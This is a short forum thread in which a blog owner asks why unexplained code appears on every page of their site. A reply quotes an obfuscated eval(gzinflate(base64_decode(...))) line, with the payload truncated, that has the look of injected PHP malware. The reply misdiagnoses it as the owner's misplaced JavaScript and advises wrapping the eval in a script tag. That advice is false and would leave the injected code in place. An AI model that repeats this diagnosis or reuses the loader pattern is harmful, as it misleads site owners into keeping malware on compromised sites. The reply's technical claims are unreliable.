djalmabright Posted August 12, 2011 Posted August 12, 2011 I have a problem with my Blog homepage - http://earthmaps.heliohost.org , please look this, with a Javascript taking almost half of the template but I can t locate it within any file in the the source code, both in themes as in the php code . This is deforming the looking of my blog on all the pages and posts. Please help me to take it from there? Thanks.
PenTester Posted August 16, 2011 Posted August 16, 2011 you have used the eval function outside the javascript. See this is your scirpt: <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php";</script> eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/ Did you notice that you have closed the script tag before the eval function itself? Put eval function inside script tag. Like this: <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php"; eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/ </script>
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now